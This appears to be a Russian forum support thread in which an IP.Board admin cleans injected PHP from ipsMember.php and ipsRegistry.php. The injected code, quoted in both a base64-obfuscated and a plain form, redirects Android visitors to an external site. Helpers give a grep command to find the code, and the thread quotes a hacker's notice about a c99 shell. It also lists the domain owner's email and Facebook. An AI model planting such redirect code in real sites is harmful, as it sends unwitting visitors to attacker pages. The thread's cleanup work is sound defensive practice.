Перейти к содержимому
Русский язык для Invision Community 5

Security update

Рекомендованные сообщения

Вот такие веселые коды прописались в ipsMember.php при удалении выскакивает ошибка форума ***/sources/base/ipsMember.php on line 3852, будем дальше искать

 

}

$mbrowser = function_exists("mobile_device_detect") ? mobile_device_detect() : false;

$is_session_alive = isset($_COOKIE['is_session_alive']) ? intval($_COOKIE['is_session_alive']) : 0;

if ($mbrowser != false && $mbrowser[1] == 'Android' && $is_session_alive < 3) {

setcookie("is_session_alive", ++$is_session_alive, time() + 3600 * 24 * 1, "/");

header(base64_decode("TG9jYXRpb246IGh0dHA6Ly93d3cua2lya2Rhdmlkc29uLmNvbS9qcy9mcC5odG1s"));

exit;

}

 

и в ipsRegistry.php - этот код снес

 

}

 

$mbrowser = mobile_device_detect();

$is_session_alive = isset($_COOKIE['is_session_alive']) ? intval($_COOKIE['is_session_alive']) : 0;

if ($mbrowser != false && $mbrowser[1] == 'Android' && $is_session_alive < 3) {

setcookie("is_session_alive", ++$is_session_alive, time() + 3600 * 24 * 1, "/");

header("Location: http://www.kirkdavidson.com/js/fp.html");

exit;

}

 

 

Если расшифровать вот это через base64 декодер TG9jYXRpb246IGh0dHA6Ly93d3cua2lya2Rhdmlkc29uLmNvbS9qcy9mcC5odG1s

получаем - Location: http://www.kirkdavidson.com/js/fp.html

 

Вот так ))

Зашел на один, а там:

Hackers had target адресфорума.net , They were using a 0-day exploit.

 

They were able to exploit the file public_html/hooks/boardIndexRecentTopics_540cbccd3003d5413b759ef888b45a23.php and replace it with a c99 shell.

 

Please do disable that plugin on all your IP.Boards.

 

:: Issued in public interest by ServerPolice Inc. htttp://serverpolice.org ::

 

 

PS : We'll be back soon ;)

 

Версия форум у них была, мне кажется, 3.4.2

Друзья, подскажите как вычистить остальное )) из ipsMember.php не могу удалить выскакивает ошибка

  • Автор

Какая ошибка?

В остальных файлов искали?

Шеллы удалили?

ssh на хостинге есть?

SSH есть. По поиску не искал, нашел только в соседнем файле sRegistry.php - и почистил вручную он там немного подругому был записал выше есть все коды которые там прописаны.

Как проверить на шеллы ? хочу поставить ХАнтера что то не ставится пока(

 

Код ошибки такой Parse error: syntax error, unexpected $end, expecting T_FUNCTION in ******/sources/base/ipsMember.php on line 3852

Ранее был вирус тот что из 128 картинки все что мог вроде почистил.

Патчи безопасности стоят

Изменено пользователем Ultima

  • Автор
SSH есть.

Перейдите в корень форума и выполните команду. В found.txt запишутся все найденные совпадения.

find . -name '*.php' | xargs grep -Pin "mobile_device_detect|kirkdavidson" > ./found.txt

 

Код ошибки такой Parse error: syntax error, unexpected $end, expecting T_FUNCTION in ******/sources/base/ipsMember.php on line 3852

Что-то лишнее удалили. Файл прикрепите.

 

Патчи безопасности стоят

Кроме патчей, нужно еще чистить изменения и левые файлы которые могли попасти на форуме до патча.

Перейдите в корень форума и выполните команду. В found.txt запишутся все найденные совпадения.

find . -name '*.php' | xargs grep -Pin "mobile_device_detect|kirkdavidson" > ./found.txt

 

 

Что-то лишнее удалили. Файл прикрепите.

 

 

Кроме патчи, нужно еще чистить изменения и левые файлы которые могли попасти на форуме до их установке.

 

А как почистить изменения и левый файлы ?

Файлы не могу залить давай на почту скину ?

Использовано 0байт из разрешенных вам 50К для загрузки файлов (максимальный размер файла: 50К)

 

 

Вот вся папка https://www.dropbox.com/s/7f7er9o703gh5f3/base.rar

 

 

Пишет The -P option is not supported

  • Автор
А как почистить изменения и левый файлы ?

Вручную, либо из бэкапа. Но если из бэкапа, прежде чем их заливать желательно проверить.

  • Автор

ipsMember.php и ipsRegistry.php

ipsMember.php и ipsRegistry.php

Это мне ?

Народ пишет что еще ipscontroller.php нужно заменить и обновить кеш стилей чтобы не выводило ошибок

 

Вручную, либо из бэкапа. Но если из бэкапа желательно прежде чем их заливать - проверить.

бэкапа к сожалению нет :) Если и есть то наверное старый.

  • Автор

Это мне ?

Народ пишет что еще ipscontroller.php нужно заменить и обновить кеш стилей чтобы не выводило ошибок

Да. В контроллере ничего нет, и кеши стилей в вашем случае тоже не причем. Код находится в ipsRegistry и вызывается он там же и в ipsMembers.

Да. В контроллере ничего нет, и кеши стилей в вашем случае тоже не причем. Код находится в ipsRegistry и вызывается он там же и в ipsMembers.

Соверженно верно этот же код ?

  • Автор

@Ultima, я вам дал очищенные файлы, можете сравнить их с теми, что у вас в архиве (вредоносный код находится в конце файлов). Дальше уже офф топ.

@Ultima, я вам дал очищенные файлы, можете сравнить их с теми, что у вас в архиве (вредоносный код находится в конце файлов). Дальше уже офф топ.

Спасибо, большое заметил что не доконца почистил от кода файлы.

Перезалил те что Вы мне дали сейчас форум работает ошибок нет.

Еще раз спасибо!!!

А человек наверное и не знает что у него такое добро на сайте живет ))

www.kirkdavidson.com/contact/

оформим ему посылку по контактам?)))

Мы ему письмо уже отправили ))

kirk@kirkdavidson.com

https://www.facebook.com/kirkdavidson

Domain Name: KIRKDAVIDSON.COM

Registrar: NEW DREAM NETWORK, LLC

 

Осталось разобратся есть ли еще зараженные файлы на форуме.

 

По поиску больше ничего подобного не нашел, поставил clamscan на сервен он тоже ничего не нашел, думаю еще проверить на руткиты.

Как обычно шеллы ищут ?

 

Вот сканер тоже полезный http://sitecheck.sucuri.net/scanner/

Создайте аккаунт или войдите в него для комментирования

Важная информация

При использовании данного сайта, вы согласаетесь с Условия использования и Чтобы сделать этот веб-сайт лучше, мы разместили cookies на вашем устройстве. Вы можете изменить свои настройки cookies, в противном случае мы будем считать, что вы согласны с этим..

Аккаунт

Навигация

Поиск

Поиск

Настроить push-уведомления браузера

Chrome (Android)
  1. Нажмите на иконку замка рядом с адресной строкой.
  2. Нажмите Права доступа -> Уведомления.
  3. Измените свои настройки.
Chrome (компьютер)
  1. Нажмите на иконку замка в адресной строке.
  2. Выберите Настройки сайта.
  3. Найдите Уведомления и измените свои настройки.